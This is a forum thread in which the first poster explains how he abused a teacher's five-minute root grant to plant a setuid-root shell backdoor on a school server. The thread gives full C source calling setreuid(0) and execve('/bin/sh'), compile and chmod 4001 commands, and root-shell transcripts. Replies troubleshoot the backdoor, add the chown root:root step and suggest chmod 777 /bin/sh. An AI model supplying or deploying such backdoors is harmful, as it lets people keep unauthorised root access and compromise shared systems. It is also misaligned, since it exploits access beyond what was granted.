[MAGMAG]

hi :)

When I was learning linux in our ins, our teacher gave us root access only for 5 minutes so we can get familiar with webmin.

Then what i did?

:D instead of using webmin, i made a telnet session with our server and became root. then i made a simple file and after that each time i wanted to became root i just executed that simple program.


What was the program?

well as u know, a file with S permission, can get root access just when it want to. it means that if in our program somehow we tell the OS to give us root access, it'll give us.

How to get root access in our program?

well as u know (or don't :D) there is a syscall named setreuid. this syscall, requests system to change the program's privilage.
well, using this syscall, our S-permission program can get root access and after that if we run any command in our program, it is executed as root.

reading the manual page of this function and the function execve can give us a good knowledge.
man 2 setreuid
man 2 execve

so the complete source of our prog will be something like this:

int main()
{
char *path[2];

path[0]="/bin/sh";
path[1]=0;
setreuid(0);
execve(path[0],path,0);
exit(0);
}

compiling this code with gcc:
gcc -o shell ./shell.c
copying our executable file to our home directory:
cp ./shell /home/mohammad
and then giving the S permission to our file (and the execution permission for everyone).
chmod 4001 /home/mohammad/shell

pay attention to copy the executable file before giving it the S permission. because the s permission will cancel during copy.

and now we have an executable file that each time we run it, we'll get a root shell :D

[mohammad@localhost mohammad]$ whoami
mohammad
[mohammad@localhost mohammad]$ ./shell
sh-2.05b# whoami
root
sh-2.05b# exit
exit
[mohammad@localhost mohammad]$

we used /bin/sh because use of it in function is more simple than bash or csh or ...

bye for now ;)

[toe]

sometimes the simplest thing works the best. very usefull.

-toe

[contrabanda]

Well,
I made all steps as you described here.
but when i'm trying to execute this prog i got error:

[contrabanda@GRT contrabanda]$ ./shell
-bash: ./shell: Permission denied
[contrabanda@GRT contrabanda]$

Can you explain, why i have such error?

[belgther]

contrabanda, on Oct 31 2005, 09:14 AM, said:

Well,
I made all steps as you described here.
but when i'm trying to execute this prog i got error:

[contrabanda@GRT contrabanda]$ ./shell
-bash: ./shell: Permission denied
[contrabanda@GRT contrabanda]$

Can you explain, why i have such error?

type chmod -a 777 ./shell and try again. With that, you set the permissions.

[contrabanda]

Quote

type chmod -a 777 ./shell and try again. With that, you set the permissions.

i made this command

chmod 4001 /home/contrabanda/shell

[Pro21]

belgther, on Oct 31 2005, 10:13 AM, said:

type chmod -a 777 ./shell and try again. With that, you set the permissions.

-a take away permissions will not work

chmod s+x ./shell maybe it s better i don t test it

s user or group set-ID
x execute permission

already why compile with ./shell name ?? useless
It s better to give a normal name like shell and to execute type ./shell ...
So if i ve the time i will test this peace of code :)

but what represent chmod 4001 ? i always used 0****but never 4***
So if someone has a response thx

[MAGMAG]

hi :)

if u r running this on your own machine and u get this error it might be because u don't have the permission to execute /bin/sh.
do this:
chmod 777 /bin/sh
or use another shell except "sh". but in that case u may have to pass some Environment variables to your shell. and it 'll become more complicated.

I don't have an exact idea why you get that error. normally every1 has the permission to run /bin/sh

or maybe some restrictions more than usual (using PAM, *deny* in /etc, /etc/security,....).

if u found out why u get this error, plz tell us. ;)

and about changing the permission:
I don't think it has much difference whitch way u change the permission. what i did was giving the least enough permission to our file (only S permission and execution permission for any1).
4000 stands for S permission and 1 is execution permission for every one (other).

bye for now ;)

[roto]

i had to chown root:root the bin then chmod 4001 the file for this to work, i bet you guys had the same mistake, making the fileas a normal user :)

roto@hollywood ~/code/linux $ gcc regetroot.c -o reget
roto@hollywood ~/code/linux $ su
Password:
hollywood linux # chown root:root reget
hollywood linux # chmod 4001 reget
hollywood linux # exit
exit
roto@hollywood ~/code/linux $ ./reget
sh-3.00# whoami
root
sh-3.00#